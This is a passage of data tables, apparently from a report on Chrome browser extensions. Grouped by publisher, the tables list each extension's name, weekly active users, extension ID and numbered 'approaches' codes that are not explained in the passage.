TabColor color picker 500,000 kcebljecdacbgcoiajdooincchocggha 1, 2, 4
Tonalis Audio Recorder 3,000,000 kdchfpnbblcmofemnhnckhjfjndcibej 1, 2, 4
2048 Classic Game 6,000,000 kgfeiebnfmmfpomhochmlfmdmjmfedfj 4
Pixdownify 7,000 kjeimdncknielhlilmlgbclmkbogfkpo 1, 2, 4, 7
Avatar Maker Studio 3,000,000 klfkmphcempkflbmmmdphcphpppjjoic 1, 2, 4
TypeScan What Font Finder 2,000,000 klopcieildbkpjfgfohccoknkbpchpcd 1, 2, 4
Rad Video Speed Controller 1,000,000 knekhgnpelgcdmojllcbkkfndcmnjfpp 1, 2, 4
Sublime Copy 2,000,000 kngefefeojnjcfnaegliccjlnclnlgck 1, 2, 4
2048 Game 6,000,000 kopgfdlilooenmccnkaiagfndkhhncdn 4
Easy PDF Viewer 600,000 kppkpfjckhillkjfhpekeoeobieedbpd 1, 2, 4
Fullshot 900,000 lcpbgpffiecejffeokiimlehgjobmlfa 1, 2, 4
Page Auto Refresh 8,000,000 ldgjechphfcppimcgcjcblmnhkjniakn 1, 2, 4
Viddex Video Downloader 2,000,000 ldmhnpbmplbafajaabcmkindgnclbaci 1, 2, 4
Smart Audio Capture 3,000,000 lfohcapleakcfmajfdeomgobhecliepj 1, 2, 4
Readline 3,000,000 lgfibgggkoedaaihmmcifkmdfdjenlpp 1, 2, 4
Amazing Auto Refresh 6,000,000 lgjmjfjpldlhbaeinfjbgokoakpjglbn 1, 2, 4
Picture in Picture player 5,000,000 lppddlnjpnlpglochkpkepmgpcjalobc 1, 2, 4
Readwell 1,000,000 mafdefkoclffkegnnepcmbcekepgmgoe 1, 2, 4
Screenshot X 1,000,000 mfdjihclbpcjabciijmcmagmndpgdkbp 1, 2, 3, 4
TubeBlock - Adblock for Youtube 7,000,000 mkdijghjjdkfpohnmmoicikpkjodcmio 1, 2, 4
Shade Dark Mode 16,000,000 mkeimkkbcndbdlfkbfhhlfgkilcfniic 1, 2, 4
PDF Wizardry 3,000,000 moapkmgopcfpmljondihnidamjljhinm 1, 2, 4
ShieldSpan Adblock 2,000,000 monfcompdlmiffoknmpniphegmegadoa 1, 2, 3, 4
Snap Color Picker 6,000,000 nbpljhppefmpifoffhhmllmacfdckokh 1, 2, 4
Spelunky Classic 3,000,000 nggoojkpifcfgdkhfipiikldhdhljhng 4
Adkrig 6,000,000 ngpkfeladpdiabdhebjlgaccfonefmom 1, 2, 3, 4
Snap Screen Recorder 4,000 njmplmjcngplhnahhajkebmnaaogpobl 1, 2, 4
SharpGrip 3,000,000 nlpopfilalpnmgodjpobmoednbecjcnh 1, 2, 4
Block Site Ex 20,000 nnkkgbabjapocnoedeaifoimlbejjckj 1, 2, 4
PageTurn Book Reader 1,000,000 oapldohmfnnhaledannjhkbllejjaljj 1, 2, 4
FocusShield 4,000,000 ohdkdaaigbjnbpdljjfkpjpdbnlcbcoj 1, 2, 4
Loudify Volume Booster 7,000,000 ohlijedbbfaeobchboobaffbmpjdiinh 1, 2, 4
ChatGPT Toolkit 6,000,000 okanoajihjohgmbifnkiebaobfkgenfa 4
Pac Man Tribute 3,000,000 okkijechcafgdmbacodaghgeanecimgd 1, 2, 4
Wordle Timeless 3,000,000 pccilkiggeianmelipmnakallflhakhh 4
Web Paint Online 3,000,000 pcgjkiiepdbfbhcddncidopmihdekemj 1, 2, 4
Live Screen Recorder 4,000,000 pcjdfmihalemjjomplpfbdnicngfnopn 1, 2, 4
Screenshot Master 6,000,000 pdlmjggogjgoaifncfpkhldgfilgghgc 1, 2, 4
Emojet - Emoji Keyboard 4,000,000 pgnibfiljggdcllbncbnnhhkajmfibgp 1, 2, 4
Metric Spy 2,000,000 plifocdammkpinhfihphfbbnlggbcjpo 1, 2, 4
Tetris Classic 6,000,000 pmlcjncilaaaemknfefmegedhcgelmee 1, 2, 4

ZingFront / ZingDeck / BigMData

Name Weekly active users Extension ID Approaches
Download Telegram - TG Video Photo Download 1,000 aaanclnbkhoomaefcdpcoeikacfilokk 1
Open AI ChatGPT for Email - GMPlus 40,000 abekedpmkgndeflcidpkkddapnjnocjp 1, 5
AI Cover Letter Generator - Supawork AI 2,000 aceohhcgmceafglcfiobamlbeklffhna 1, 2
AI Headshot Generator - Supawork AI 5,000 acgbggfkaphffpbcljiibhfipmmpboep 1, 6
IG Follower Export Tool - IG Email Extractor 10,000 acibfjbekmadebcjeimaedenabojnnil 1
WA Sender - Bulk Message & WA Message & Bulk Sender Tool 3,000 aemhfpfbocllfcbpiofnmacfmjdmoecf 1, 5
Save Ins Comment - Export Ins Comments 1,000 afkkaodiebbdbneecpjnfhiinjegddco 1
Coursera Summary with ChatGPT and Take Notes 3,000 afmnhehfpjmkajjglfakmgmjcclhjane 1, 2, 5
Extension Manager for Chrome™ 966 ahbicehkkbofghlofjinmiflogakiifo 1, 5
Email Finder & Email Hunter - GMPlus 10,000 aihgkhchhecmambgbonicffgneidgclh 1, 5
Sora Video To Video - Arting AI 106 aioieeioikmcgggaldfknjfoeihahfkb 1, 2
ChatGPT for 知乎 415 ajnofpkfojgkfmcniokfhodfoedkameh 1, 2, 5
Walmart Finder&ChatGPT Review Analysis 457 akgdobgbammbhgjkijpcjhgjaemghhin 5
WA Bulk Message Sender - Premium Sender 1,000 amokpeafejimkmcjjhbehganpgidcbif 1
One-Click Search Aliexpress Similar Products 97 aobhkgpkibbkonodnakimogghmiecend 5
Summary with Bing Chat for YouTube 9,000 aohgbidimgkcolmkopencknhbnchfnkm 1, 5
Rakuten Customer Service Helper 42 apfhjcjhmegloofljjlcloiolpfendka 5
ChatBot AI - ChatGPT & Claude & Bard & Bing 883 apknopgplijcepgmlncjhdcdjifhdmbo 4, 5
NoteGPT: YouTube Summary, Webpages & PDF Summary 200,000 baecjmoceaobpnffgnlkloccenkoibbb 5
Dimmy - Discord Chat Exporter 252 bbgnnieijkdeodgdkhnkildfjbnoedno 1
Gmail Notes - Add notes to email in Gmail 1,000 bbpgdlmdmlalbacneejkinpnpngnnghj 5
Sora Image To Video - Arting AI 372 bdhknkbhmjkkincjjmhibjeeljdmelje 1, 2
Tiktok Customer Service Helper 66 bdkogigofdpjbplcphfikldoejopkemf 5
TikClient - Web Client for TikTok™ 10,000 beopoaohjhehmihfkpgcdbnppdeaiflc 1, 2, 6
One-Click Search Amazon Similar Products 146 bfeaokkleomnhnbhdhkieoebioepbkkb 5
Custom New Tab Page 864 bfhappcgfmpmlbmgbgmjjlihddgkeomd 5
Shopee Downloader - Download Videos & Images 3,000 bfmonflmfpmhpdinmanpaffcjgpiipom 1, 2, 5
Product Photography - Ai Background Generator For Prouduct Photos 46 bgehgjenjneoghlokaelolibebejljlh 1, 2
TikGPT: Tiktok Listing Optimizer 665 bhbjjhpgpiljcinblahaeaijeofhknka 5
Find WhatsApp Link - Group Invite Link 2,000 biihmgacgicpcofihcijpffndeehmdga 1, 5
VideoTG - Download & Save telegram Videos Fast & one time! 4,000 bjnaoodhkicimgdhnlfjfobfakcnhkje 1
Etsy™ AI Review Analysis & Download 8,000 bjoclknnffeefmonnodiakjbbdjdaigf 5
iGoo Helper - Security Privacy Unblock VPN 20,000 bkcbdcoknmfkccdhdendnbkjmhdmmnfc 5
TikTok Analytics & Sort Video by Engagement 1,000 bnjgeaohcnpcianfippccjdpiejgdfgj 5
Rakuten AI Listing editor 68 cachgfjiefofkmijjdcdnenjlljpiklj 5
Invite All Friends for Facebook™ in one click 10,000 cajeghdabniclkckmaiagnppocmcilcd 5
EbayGPT: ChatGPT Ebay listing optimization 2,000 cbmmciaanapafchagldbcoiegcajgepo 5
Comment Exporter 10,000 cckachhlpdnncmhlhaepfcmmhadmpbgp 1, 2
Twitch Danmaku(NicoNico style) 646 cecgmkjinnohgnokkfmldmklhocndnia 5
Easy Exporter - Etsy order exporter 2,000 cgganjhojpaejcnglgnpganbafoloofa 5
Privacy Extension for WhatsApp Privacy 100,000 cgipcgghboamefelooajpiabilddemlh 1, 2
Group Extractor for social media platform 1,000 chldekfeeeaolinlilgkeaebbcnkigeo 6
Sales Sort for eBay™ Advanced Search 4,000 cigjjnkjdjhhncooaedjbkiojgelfocc 1, 2, 3, 5
Amazon Customer Service Helper 70 cmfafbmoadifedfpkmmgmngimbbgddlo 5
Currency Conversion Calculator 2,000 cmkmopgjpnjhmlgcpmagbcfkmakeihof 5
LinkedRadar-Headline Generator for LinkedIn™ 1,000 cnhoekaognmidchcealfgjicikanodii 1, 5
AllegroGPT:ChatGPT for Allegro Open AI Writer 163 coljimimahbepcbljijpimokkldfinho 5
ai voice cover 518 cpjhnkdcdpifokijolehlmomppnfflop 1
WA Contacts Extractor 30,000 dcidojkknfgophlmohhpdlmoiegfbkdd 1
Twitch chat overlay on fullscreen 832 dckidogeibljnigjfahibbdnagakkiol 5
Privacy Extension for WhatsApp Privacy 660 dcohaklbddmflhmcnccgcajgkfhchfja 1
LINE App Translator Bot - LINE Chat 1,000 dimpmploihiahcbbdoanlmihnmcfjbgf 5
Etsy Image Search 1,000 dkgoifbphbpimdbjhkbmbbhhfafjdilp 5
AliExpress & eBay - Best price 575 dkoidcgcbmejimkbmgjimpdgkgilnncj 5
AliGPT: Aliexpress Listing Optimize 1,000 dlbmngbbcpeofkcadbglihfdndjbefce 5
Best ASO Tools for Google Play Store 10,000 doffdbedgdhbmffejikhlojkopaleian 5
NoteGPT: AI Flashcard for Quizlet and Cram 10,000 eacfcoicoelokngmcgkkdakohpaklgmk 1, 2, 5
ChatSider AI Copilot : ChatGPT & Claude 2,000 ecnknpjoomhilbhjipoipllgdgaldhll 6
Mercadolivre Customer Service Helper with GPT 19 edhpagpcfhelpopmcdjeinmckcjnccfm 5
WA Contacts Extractor Free Extension 30,000 eelhmnjkbjmlcglpiaegojkoolckdgaj 1, 6
Unlimited Summary Generator for YouTube™ 70,000 eelolnalmpdjemddgmpnmobdhnglfpje 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 10,000 efaadoiclcgkpnjfgbaiplhebcmbipnn 1, 2
Ebay Kundendiensthelfer mit GPT 123 efknldogiepheifabdnikikchojdgjhb 5
Extension Manager 8,000 efolofldmcajcobffimbnokcnfcicooc 5
Send from Gmail - Share a Link Via Email 5,000 egefdkphhgpfilgcaejconjganlfehif 1, 3, 5
Followers Exporter for Ins 100,000 ehbjlcniiagahknoclpikfjgnnggkoac 1, 2
Website Keyword Extractor & Planner Tool 10,000 eiddpicgliccgcgclfoddoiebfaippkj 6
AMZ Currency Converter —— Amazon TS 457 ekekfjikpoacmfjnnebfjjndfhlldegj 1
eCommerce Profit Calculator 3,000 elclhhlknlgnkbihjkneaolgapklcakh 1, 2, 5
ChatGPT for Google (No Ads) 30,000 elnanopkpogbhmgppdoapkjlfigecncf 1, 3, 5
AI Resume Builder - Supawork AI 9,000 epljmdbeelhhkllonphikmilmofkfffb 1, 4
aliexpress image video download 1,000 epmknedkclajihckoaaoeimohljkjmip 5
InstaNote: Download and Save Video for IG 10,000 fbccnclbchlcnpdlhdjfhbhdehoaafeg 1, 2, 5
Ebay Niche Finder&ChatGPT Review Analysis 419 fencfpodkdpafgfohkcnnjjepolndkoc 5
One-Click Search Etsy Similar Products 83 fffpcfejndndidjbakpmafngnmkphlai 5
WA Link Generator 315 fgmmhlgbkieebimhondmhbnihhaoccmj 1
AI Script Writer & Video to Text for TikTok 9,000 fhbibaofbmghcofnficlmfaoobacbnlm 1, 2, 5
WA Bulk Message Sender 100,000 fhkimgpddcmnleeaicdjggpedegolbkb 1, 5
Free VPN For Chrome - HavenSurf VPN 3,000 fnofnlokejkngcopdkaopafdbdcibmcm 5
McdGPT: Mercadolivre AI Listing edit 340 fpgcecmnofcebcocojgbnmlakeappphj 5
CRM Integration with LinkedIn for Salesforce 411 fpieanbcbflkkhljicblgbmndgblndgh 5
Online Photoshop - Photo Editor Tool 577 fplnkidbpmcpnaepdnjconfhkaehapji 1, 2, 5
Telegram Private Video Downloader 20,000 gdfhmpjihkjpkcgfoclondnjlignnaap 1, 2
AI Signature Generator - SignMaker 74 gdkcaphpnmahjnbbknailofhkdjgonjp 1, 2, 5
Privacy Extension for WhatsApp Web 2,000 gedkjjhehhbgpngdjmjoklficpaojmof 1
One-Click Search Shein Similar Products 232 gfapgmkimcppbjmkkomcjnamlcnengnp 5
Summary with ChatGPT for Google and YouTube 10,000 gfecljmddkaiphnmhgaeekgkadnooafb 1, 2, 5
ESale - Etsy™ SEO tool for seller 10,000 ghnjojhkdncaipbfchceeefgkkdpaelk 5
Twitter Video Downloader 10,000 giallgikapfggjdeagapilcaiigofkoe 1, 2, 5
Video Downloader and Summary for TikTok 3,000 gibojgncpopnmbjnfdgnfihhkpooodie 1, 2, 5
Audio Recorder Online - Capture Screen Audio 3,000 gilmhnfniipoefkgfaoociaehdcmdcgk 1, 2, 5
WalmartGPT:ChatGPT for Walmart Open AI Writer 682 gjacllhmphdmlfomfihembbodmebibgh 5
ChatShopee - AI Customer Service Helper 88 glfonehedbdfimabajjneobedehbpkcf 5
Magic VPN - Best Free VPN for Chrome 5,000 glnhjppnpgfaapdemcpihhkobagpnfee 5
Translate and Speak Subtitles for YouTube 40,000 gmimaknkjommijabfploclcikgjacpdn 1, 2, 3, 5
Messenger Notifier 3,000 gnanlfpgbbiojiiljkemdcampafecbmk 5
One-Click Search Walmart Similar Products 103 golgjgpiogjbjbaopjeijppihoacbloi 5
TikTok Hashtags Tool - Hashtags Analytics 779 haefbieiimgmamklihjpjhnhfbonfjgg 1, 5
Gmail Checker - Multi Account Gmail Notifier 9,000 hangbmidafgeohijjheoocjjpdbpaaeh 1, 5
Bulk Message Sender for wa 281 hcbplmjpaneiaicainjmanjhmdcfpeji 2
APP For IG DM 10,000 hccnecipbimihniebnopnmigjanmnjgh 1, 2, 5
Likes Exporter 6,000 hcdnbmbdfhhfjejboimdelpfjielfnde 1, 2
ChatsNow: ChatGPT AI Sidebar ( GPT, Claude , Gemini) 20,000 hcmiiaachajoiijecmakkhlcpagafklj 1, 2, 5
iTextMaster - ChatPDF & PPT AI with ChatGPT 6,000 hdofgklnkhhehjblblcdfohmplcebaeg 1, 2, 3, 5
Shopify™ Raise - Shopify™ store analysis tool 10,000 hdpfnbgfohonaplgnaahcefglgclmdpo 1, 2, 3
ShopeeGPT - Optimize Titles & Descriptions 713 hfgfkkkaldbekkkaonikedmeepafpoak 5
Telegram Desktop - Telegram Online Messenger 4,000 hifamcclbbjnekfmfgcalafnnlgcaolc 5
CommentGPT - Shopee review analysis assistant 321 hjajjdbieadchdmmifdjgedfhgdnonlh 5
Vimeo™ Downloader and chatGPT Video Summary 40,000 hobdeidpfblapjhejaaigpicnlijdopo 1, 2, 5
IG Comment Export Tool 4,000 hpfnaodfcakdfbnompnfglhjmkoinbfm 1, 2, 5
SEO Search Keyword Tool 40,000 hpmllfbpmmhjncbfofmkkgomjpfaocca 5
IG Video Downloader - SocialPlus 5,000 iaonookehgfokaglaodkeooddjeaodnc 1, 2, 5
AdLibNote: Video Downloader for Facebook™ 10,000 icphfngeemckldjnnoemfadfploieehk 1, 2, 5
IGExporter - IG Follower Export Tool 2,000 iffbofdalhbflagjclkhbkbknhiflcam 1, 2, 5
Wasup Translator - Translate WhatsApp Messages 328 ifhamodfnpjalblgmnpdidnkjjnmkbla 1, 5
Free VPN For Chrome - HavenSurf VPN 1,000 ihikodioopffhlfhlcjafeleemecfmab 5
TelePlus - Multi-Accounts Sender 8,000 ihopneheidomphlibjllfheciogojmbk 1, 2, 5
Keywords Explorer For Google Play Store (ASO) 2,000 ijegkehhlkpmicapdfdjahdmpklimdmp 6
Mass follow for Twitter 1,000 ijppobefgfjffcajmniofbnjkooeneog 1, 5
Etsy Customer Service Helper with ChatGPT 506 ikddakibljikfamafepngmlnhjilbcci 5
Telegram Group and Channel Search Tool 7,000 ilpgiemienkecbgdhdbgdjkafodgfojl 1, 2, 5, 7
NoteGPT: Udemy Summary with ChatGPT & Claude 8,000 indcipieilphhkjlepfgnldhjejiichk 1, 2, 5
Volume booster - Volumax 2,000 ioklejjbhddpcdgmpcnnpaoopkcegopp 6
AmzGPT: Amazon listing edit 4,000 jijophmdjdapikfmbckmhhiheghkgoee 5
TTNote: Video Downloader and Saver 30,000 jilgamolkonoalagcpgjjijaclacillb 1, 2, 5
GS Helper For Google Search Google Scholar 2,000 jknbccibkbeiakegoengboimefmadcpn 5
WASender - WA Bulk Message Sender 1,000 jlhmomandpgagmphfnoglhikpedchjoa 1
ai celebrity voice clone 572 jlifdodinblfbkbfmjinkpjieglkgfko 1
WAPlus CRM - Best WhatsApp CRM with AI 60,000 jmjcgjmipjiklbnfbdclkdikplgajhgc 1
Save Webpage As PDF 10,000 jncaamlnmeladalnajhgbkedibfjlmde 5
Etsy™ Reviews Extractor 1,000 jobjhhfnfkdkmfcjnpdjmnmagepnbifi 5
AI Image Generator: Get AI Art with Any Input 1,000 jojlhafjflilmhpakmmnchhcbljgmllh 5
TG Sender - TG bulk message send and invite 20,000 kchbblidjcniipdkjlbjjakgdlbfnhgh 1, 2, 5
QR Code Generator 25 kdhpgmfhaakamldlajaigcnanajekhmp 1
Browser VPN - Free and unlimited VPN proxy 7,000 kdjilbflpbbilgehjjppohpfplnapkbp 5
Summary Duck Assistant 1,000 kdmiipofdmffkgfpkigioehfdehcienf 1, 2
FindNiche - aliexpress™ dropshipping & analytics tool 1,000 kgggfelpkelliecmgdmfjgnlnhfnohpi 2, 3, 5
LinkedRadar - Email Finder for LinkedIn ™ 50,000 kgpckhbdfdhbkfkepcoebpabkmnbhoke 1, 5
WA - Download Group Phone Numbers 4,000 khajmpchmhlhfcjdbkddimjbgbchbecl 1, 5
WA Self Sender for WhatsApp Web(Easy Sender) 10,000 khfmfdepnleebhonomgihppncahojfig 1
GPT for Ecom: Product Listing optimizer 20,000 khjklhhhlnbeponjimmaoeefcpgbpgna 1, 2, 5
IG Follower Export Tool - IG Tools 100,000 kicgclkbiilobmccmmidfghnijgfamdb 1, 2, 5
WhatsApp Realtime Translate&Account Warm Up&Voice message Transcript 1,000 kifbmlmhcfecpiidfebchholjeokjdlm 1, 5
WA Group Sender 10,000 kilbeicibedchlamahiimkjeilnkgmeo 5
FindNiche - Shopify™ store traffic analysis 7,000 kiniklbpicchjlhhagjhchoabjffogni 1, 2, 3, 5, 7
Telegram Restricted Content Downloader 7,000 kinmpocfdjcofdjfnpiiiohfbabfhhdd 1, 2
website broken link and 404 error checker 10,000 kkjfobdnekhdpmgomkpeibhlnmcjgian 1, 2, 5
TG Content Downloader - download telegram restricted files 983 kljkjamilbfohkmbacbdongkddmoliag 1, 5
Comment Assistant In LinkedIn™ 978 kmchjegahcidgahijkjoaheobkjjgkfj 5
Tab Manager - Smart Tab By NoteGPT AI 7,000 kmmcaankjjonnggaemhgkofiblbjaakf 1, 2, 5
WA Number Checker 5,000 knlfobadedihfdcamebpjmeocjjhchgm 1, 2
Telegram downloader - TG Video Photo Download 4,000 kofmimpajnbhfbdlijgcjmlhhkmcallg 1
WA Group Link Finder 2,000 kpinkllalgahfocbjnplingmpnhhihhp 1, 2
One-Click Search Ozon Similar Products 96 laoofjicjkiphingbhcblaojdcibmibn 5
WADeck - WA AI ChatBot &WhatsApp Sender 40,000 lbjgmhifiabkcifnmbakaejdcbikhiaj 1, 5
AliNiche Finder&ChatGPT Review Analysis 484 ldcmkjkhnmhoofhhfendhkfmckkcepnj 5
Fashion Model-AI Model Generator For Amazon 1,000 ldlimmbggiobfbblnjjpgdhnjdnlbpmo 1, 5
WhatsApp Group Management Pro - Export, Broadcast & Monitor Suite 20,000 ldodkdnfdpchaipnoklfnfmbbkdoocej 1, 2, 5
Photo download & Save image 8,000 leiiofmhppbjebdlnmbhnokpnmencemf 5
Aliexpress Customer Service Helper 191 lfacobmjpfgkicpkigjlgfjoopajphfc 5
Find WhatsApp Link - Group Invite Link 10,000 lfepbhhhpfohfckldbjoohmplpebdmnd 5
Yahoo - optimize listing & AI Writer 69 lgahpgiabdhiahneaooneicnhmafploc 5
Amazon Finder&ChatGPT Review Analysis 821 lgghbdmnfofefffidlignibjhnijabad 5
AI Resume Builder - LinkedRadar 10,000 lijdbieejfmoifapddolljfclangkeld 1, 4
Article Summary with ChatGPT and Take Notes 8,000 llkgpihjneoghmffllamjfhabmmcddfh 1, 2, 5
AliNiche - AliExpress™ Product Research Tool 30,000 lmlkbclipoijbhjcmfppfgibpknbefck 1, 2, 5
ModelAgents - AI Fashion Models Generator 5,000 lmnagehbedfomnnkacohdhdcglefbajd 5
Gmail Address Check & Send Verify Tool 2,000 lmpigfliddkbbpdojfpbbnginolfgdoh 5
WA Number Checker - Check & Verify WA Number 5,000 lobgnfjoknmnlljiedjgfffpcbaliomk 1
Free AI Voice: Best Text to Speech Tool 1,000 lokmkeahilhnjbmgdhohjkofnoplpmmp 5
IG Email Extractor - Ins Followers Exporter 3,000 lpcfhggocdlchakbpodhamiohpgebpop 1, 5
WA Bulk Sender 5,000 mbmlkjlaognpikjodedmallbdngnpbbn 1
YouTube Comment Summary with ChatGPT OpenAI 3,000 mcooieiakpekmoicpgfjheoijfggdhng 5
Ad Library - Ads Spy Tool For YouTube™ 2,000 mdbhllcalfkplbejlljailcmlghafjca 5
Schedule Email by Gmail 862 mdndafkgnjofegggbjhkccbipnebkmjc 1, 5
Feature Graphic Downloader for Play Store 546 meibcokbilaglcmbboefiocaiagghdki 5
One-Click Search eBay Similar Products 75 mjibhnpncmojamdnladbfpcafhobhegn 5
Twiclips - Twitch Clip Downloader 8,000 mjnnjgpeccmgcobgegepeljeedilebif 1, 2, 5
Auto Connect for LinkedIn™ - LeadRadar 1,000 mliipdijmfmbnemagicfibpffnejhcki 1
Easy Web Data Scraper 40,000 mndkmbnkepbhdlkhlofdfcmgflbjggnl 1, 2, 3, 5
wa privacy 68 nccgjmieghghlknedlgoeljlcacimpma 1
Ad Library - Ads Spy Tool For Pinterest™ 2,000 ndopljhdlodembijhnfkididjnahadoj 5
Universal Keyword Planner box 5,000 niaagjifaifoebkdkkndbhdoamicolmj 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 30,000 niepmhdjjdggogblnljbdflekfohknmc 1, 2
WA Group Sender & Group Link Scraper 1,000 nimhpogohihnabaooccdllippcaaloie 1, 2
Ad Library - Ads Spy Tool For Twitter™ 1,000 nkdenifdmkabiopfhaiacfpllagnnfaj 5
TikTok Video Tags Summary with ChatGPT 860 nmccmoeihdmphnejppahljhfdggediec 5
Image Zoom Tool 5,000 nmpjkfaecjdmlebpoaofafgibnihjhhf 1, 2, 5
ChatSider:Free ChatGPT Assistant(GPT4) 1,000 nnadblfkldnlfoojndefddknlhmibjme 7
Telegram Channels - TG Channel Link Search 1,000 nnbjdempfaipgaaipadfgfpnjnnflakl 5
H1B Sponsor Checker, Job Seek - LinkedRadar 463 noiaognlgocndhfhbeikkoaoaedhignb 1, 4, 5
WAContactSaver 7,000 nolibfldemoaiibepbhlcdhjkkgejdhl 1
vk video downloader - vkSaver 10,000 npabddfopfjjlhlimlaknekipghedpfk 1, 2, 5
Multi Chat - All Chat In One For You - SocialPlus 1,000 oaknbnbgdgflakieopfmgegbpfliganc 1, 2, 5
Twitch Channel Points Auto Claimer -Twiclips 3,000 ocoimkjodcjigpcgfbnddnhfafonmado 5
WalmartHunt-Walmart Dropshipping Tools 4,000 oeadfeokeafokjbffnibccbbgbjcdefe 1, 2, 5
TTAdNote: Download and Save Ad No Watermark 8,000 oedligoomoifncjcboehdicibddaimja 1, 2, 5
Discordmate - Discord Chat Exporter 20,000 ofjlibelpafmdhigfgggickpejfomamk 5
Social Media Downloader - SocialPlus 4,000 ofnmkjeknmjdppkomohbapoldjmilbon 1
NoteGPT: ChatGPT Summary for Vimeo 5,000 oihfhipjjdpilmmejmbeoiggngmaaeko 1, 2, 5
Aliexpress search by image 5,000 ojpnmbhiomnnofaeblkgfgednipoflhd 1, 2, 5
Privacy Extension for WhatsApp Web 4,000 okglcjoemdnmmnodbllbcfaebeedddod 1
Denote: Save Ads TikTok & FB Ad Library 40,000 okieokifcnnigcgceookjighhplbhcip 1, 2
Allegro Customer Service Helper with Open AI 13 olfpfedccehidflokifnabppdkideeee 5
LinkedRadar - LinkedIn Auto Connect Tool 198 onjifbpemkphnaibpiibbdcginjaeokn 1
WAPI - Send personalized messages 20,000 onohcnjmnndegfjgbfdfaeooceefedji 1
Entrar for Gmail™ 5,000 oolgnmaocjjdlacpbbajnbooghihekpp 5
Group exporter 2 19 opeikahlidceaoaghglikdpfdkmegklg 1
Keyword Finder-SEO keywords Tool 5,000 oppmgphiknonmjjoepbnafmbcdiamjdh 5
Search Engine Featuring ChatGPT - GPT Search 775 pbeiddaffccibkippoefblnmjfmmdmne 1, 5
Amazon Price History Tracker - AmzChart 737 pboiilknppcopllbjjcpdhadoacfeedk 5
Shopify Wise - Shopify analytics & Dropship tool 762 pckpnbdneenegpkodapaeifpgmneefjd 5
Vimeo™ Video Downloader Pro 70,000 penndbmahnpapepljikkjmakcobdahne 5
DealsUpp - Contact Saver for WA 2,000 pfomiledcpfnldnldlffdebbpjnhkbbl 1, 5
Profile Scraper - Leadboot 2,000 pgijefijihpjioibahpfadkabebenoel 1
-com Remove Background 105 pgomkcdpmifelmdhdgejgnjeehpkmdgl 1
EasyGood - Free Unlimited VPN Proxy 1,000 pgpcjennihmkbbpifnjkdpkagpaggfaa 5
FindNiche - AliExpress™ Data Exporter 114 pjjofiojigimijfomcffnpjlcceijohm 5
Share Preview Save to Social 419 pkbmlamidkenakbhhialhdmmkijkhdee 1, 3
Voice Remaker - The Best AI Generator 10,000 pnlgifbohdiadfjllfmmjadcgofbnpoi 1, 5
Pincase-Pinterest Video & Image Downloader 10,000 poomkmbickjilkojghldlelgjmgaabic 5
Ad Library - Ad Finder & Adspy Tool 30,000 ppbmlcfgohokdanfpeoanjcdclffjncg 5
YouTube Video Tags Summary with ChatGPT 908 ppfomhocaedogacikjldipgomjdjalol 1, 5

ExtensionsBox

Name Weekly active users Extension ID Approaches
Amazon Reviews Extractor 1,000 aapmfnbcggnbcghjipmpcngmflbjjfnb 1, 2
Target Images Downloader 100 adeimcdlolcpdkaapelfnacjjnclpgpb 2
Airbnb Images Downloader 433 alaclngadohenllpjadnmpkplkpdlkni 1, 2
eBay Reviews Extractor 200 amagdhmieghdldeiagobdhiebncjdjod 2
Lazada Images Downloader 363 bcfjlfilhmdhoepgffdgdmeefkmifooo 1, 2
Shopify2Woo - Shopify to WooCommerce 543 bfnieimjkglmfojnnlillkenhnehlfcj 1, 2
Group Extractor 3,000 bggmbldgnfhohniedfopliimbiakhjhj 1, 2
Shein Reviews Extractor - Scrape Data to CSV 388 bgoemjkklalleicedfflkkmnnlcflnmd 1, 2
Airbnb Reviews Extractor 86 bklllkankabebbiipcfkcnmcegekeagj 1, 2
eBay Images Downloader 863 bkpjjpjajaogephjblhpjdmjmpihpepm 1, 2
Indeed Scraper 2,000 bneijclffbjaigpohjfnfmjpnaadchdd 1, 2
Shein to Shopify CSV Exportor 130 cacbnoblnhdipbdoimjhkjoonmgihkec 1, 2
Justdial Scraper 1,000 ccnfadfagdjnaehnpgceocdgajgieinn 1, 2
AI Review Summarizer - Get ChatGPT Review Analysis in One Click 24 cefjlfachafjglgeechpnnigkpcehbgf 2
Booking Hotel Scraper 123 cgfklhalcnhpnkecicjabhmhlgekdfic 1, 2
Contact Extractor for wa 2,000 chhclfoeakpicniabophhhnnjfhahjki 2
AI Reviews Summary for Google Maps 17 cmkkchmnekbopphncohohdaehlgpmegi 2
AliExpress Images Downloader 938 cpdanjpcekhgkcijkifoiicadebljobn 1, 2
Shopy - Shopify Spy 2,000 dehlcjmoincicbhdnkbnmkeaiapljnld 1, 2
Profile Scraper for LinkedIn™ 473 dmonpchcmpmiehffgbkoimkmlfomgmbc 1, 2
Trustpilot Reviews Extractor 481 eikaihjegpcchpmnjaodjigdfjanoamn 1, 2
Indeed Review Extractor 17 ejmkpbellnnjbkbagmgabogfnbkcbnkb 1, 2
AliExpress Reviews Extractor 409 elcljdecpbphfholhckkchdocegggbli 1, 2
Etsy Reviews Extractor 306 fbbobebaplnpchmkidpicipacnogcjpk 2
Post Scraper 34 fcldaoddodeaompgigjhplaalfhgphfo 2
Images Downloader for WM 707 fdakeeindhklmojjbfjhgmpodngnpcfk 1, 2
Twitch Chat Downloader 132 fkcglcjlhbfbechmbmcajldcfkcpklng 1, 2
Costco Images Downloader 35 fpicpahbllamfleebhiieejmagmpfepi 1, 2
Etsy Images Downloader 1,000 gbihcigegealfmeefgplcpejjdcpenbo 2
Yelp Scraper 347 gbpkfnpijffepibabnledidempoaanff 2
Lazada Reviews Extractor 102 gcfjmciddjfnjccpgijpmphhphlfbpgl 1, 2
Shopee Reviews Extractor 484 gddchobpnbecooaebohmcamdfooapmfj 2
Comments Exporter for Ins 47 gdhcgkncekkhebpefefeeahnojclbgeg 1, 2
Wayfair Images Downloader 169 ggcepafcjdcadpepeedmlhnokcejdlal 2
Amazon Images Downloader 1,000 ggfhamjeclabnmkdooogdjibkiffdpec 1, 2
Shein Images Downloader 3,000 ghnnkkhikjclkpldkbdopbpcocpchhoi 1, 2
Reviews Extractor for WM 369 gidbpinngggcpgnncphjnfjkneodombd 2
Zillow Scraper - Agent & Property Export 308 gjhcnbnbclgoiggjlghgnnckfmbfnhbb 2
G2 Reviews Extractor 189 hdnlkdbboofooabecgohocmglocfgflo 1, 2
X Jobs Scraper 35 hillidkidahkkchnaiikkoafeaojkjip 1, 2
Booking Reviews Extractor 201 iakjgojjngekfcgbjjiikkhfcgnejjoa 1, 2
Shein Scraper 1,000 ibbjcpcbjnjlpfjinbeeefbldldcinjg 1, 2
